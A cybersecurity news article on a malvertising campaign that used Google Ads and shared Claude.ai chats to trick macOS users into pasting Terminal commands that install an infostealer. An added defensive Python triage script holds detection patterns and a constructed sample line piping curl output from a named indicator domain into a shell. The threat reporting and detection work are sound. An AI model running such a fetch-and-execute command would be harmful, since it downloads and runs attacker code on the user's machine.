In the ever-evolving landscape of cybersecurity, we find ourselves confronted with a clever and insidious tactic employed by hackers. The abuse of trusted platforms like Google Ads and AI-powered chats to disseminate malware is a worrying development. This article delves into this emerging threat, offering insights and analysis on how attackers are exploiting our digital trust.
The Malicious Campaign Unveiled
A recent malvertising campaign has brought to light the dangerous practice of using Google Ads and Claude.ai chats to distribute malware targeting macOS users. The campaign, first spotted by security engineer Berk Albayrak, involves a sophisticated social engineering approach. Users searching for 'Claude mac download' may encounter sponsored results leading them to Claude.ai, but these results are a trap, luring users into installing malware on their devices.
Weaponizing Shared Chats
What makes this campaign particularly intriguing is the weaponization of shared Claude chats. Albayrak identified a chat posing as an official 'Claude Code on Mac' installation guide, allegedly from 'Apple Support'. This chat guides users through a series of steps, including opening Terminal and pasting a command, which ultimately downloads and executes malware on their Macs.
A Tale of Two Chats
Upon further investigation, a second shared Claude chat was discovered, employing the same attack strategy but with different infrastructure. Both chats followed an identical structure, yet used distinct domains and payloads. This suggests a well-organized and coordinated effort by the attackers.
The Malware's M.O.
The malware, delivered through base64-encoded instructions pasted into Terminal, downloads an encoded shell script from domains like customroofingcontractors[.]com and bernasibutuwqu2[.]com. The script is decoded and executed in memory rather than saved to disk, leaving minimal traces. It collects sensitive information, including browser credentials, cookies, and macOS Keychain contents, and exfiltrates this data to the attacker's server.
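The pattern described above (a pasted command that decodes base64 and pipes the result, or remotely fetched content, straight into a shell) is something a defender can look for in process-execution telemetry. The following is an added example, not code from the original article or from any of the parties it names: a small triage routine run over constructed sample command lines, flagging decode-to-shell and fetch-to-shell chains and matching URL hosts against the two indicator domains the article names. The event format and the sample events are assumptions made for the demonstration.

```python
import re

# Constructed sample process-execution events, not real telemetry.
# Assumed format: "<timestamp> <parent process> -> <command line>".
SAMPLE_EVENTS = [
    "2025-01-01T10:00:01Z Terminal -> bash -c 'echo ZWNobyBoaQ== | base64 -d | sh'",
    "2025-01-01T10:00:02Z Terminal -> curl -fsSL https://customroofingcontractors.com/x.sh | sh",
    "2025-01-01T10:00:03Z Terminal -> ls -la ~/Downloads",
    "2025-01-01T10:00:04Z Terminal -> brew install gimp",
]

# Indicator domains named in the article, with the defanging brackets removed.
IOC_DOMAINS = {"customroofingcontractors.com", "bernasibutuwqu2.com"}

# Heuristics for the "decode and execute in memory" chain the article describes.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z)?sh\b")          # "... | sh" / "| bash" / "| zsh"
DECODE_STAGE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")  # base64 decoding step
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b")             # download step
URL_HOST = re.compile(r"https?://([^/\s'\"]+)")


def classify_event(event: str) -> dict:
    """Return the command line, whether it looks suspicious, and why."""
    cmd = event.split(" -> ", 1)[1]
    reasons = []
    if DECODE_STAGE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("base64 decoded and piped to a shell")
    if REMOTE_FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("remote content piped straight to a shell (fileless)")
    hits = {h.lower() for h in URL_HOST.findall(cmd)} & IOC_DOMAINS
    if hits:
        reasons.append("known indicator domain: " + ", ".join(sorted(hits)))
    return {"cmd": cmd, "suspicious": bool(reasons), "reasons": reasons}


def triage(events) -> list:
    """Keep only the events that tripped at least one heuristic."""
    return [r for r in (classify_event(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["cmd"], "->", "; ".join(hit["reasons"]))
```

The heuristics are deliberately narrow; in production they would sit alongside the parent-process context (Terminal spawning a shell that reaches out to the network) rather than on command-line text alone.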
Targeting with Precision
One variant of the malware even includes a profiling step, checking the victim's keyboard input sources. If the machine has Russian or CIS-region keyboard settings, the script exits, suggesting the attackers are selectively targeting specific regions. This level of sophistication indicates a highly skilled and targeted operation.
The Danger of Legitimate URLs
What makes this campaign particularly concerning is the use of legitimate URLs. Both Google ads point to Anthropic's real domain, claude.ai, because the attackers host their malicious instructions within Claude's shared chat feature rather than on a lookalike site. This means users may not realize they are being led astray until it's too late.
A Growing Trend
Malvertising has become a recurring tactic for malware distribution. Similar campaigns have targeted users searching for software like GIMP, where convincing Google ads led to lookalike phishing sites. This campaign takes it a step further by exploiting the trust associated with legitimate domains.
Staying Vigilant
To protect themselves, users should navigate directly to claude.ai to download the native Claude app and avoid clicking sponsored search results. It's also important to be cautious of any instructions asking you to paste Terminal commands, regardless of their apparent source.
Final Thoughts
As AI and machine learning continue to advance, so too do the tactics of cybercriminals. This campaign serves as a stark reminder of the need for constant vigilance and critical thinking when navigating the digital realm. The abuse of trusted platforms highlights the importance of robust security measures and user education in the ongoing battle against cyber threats.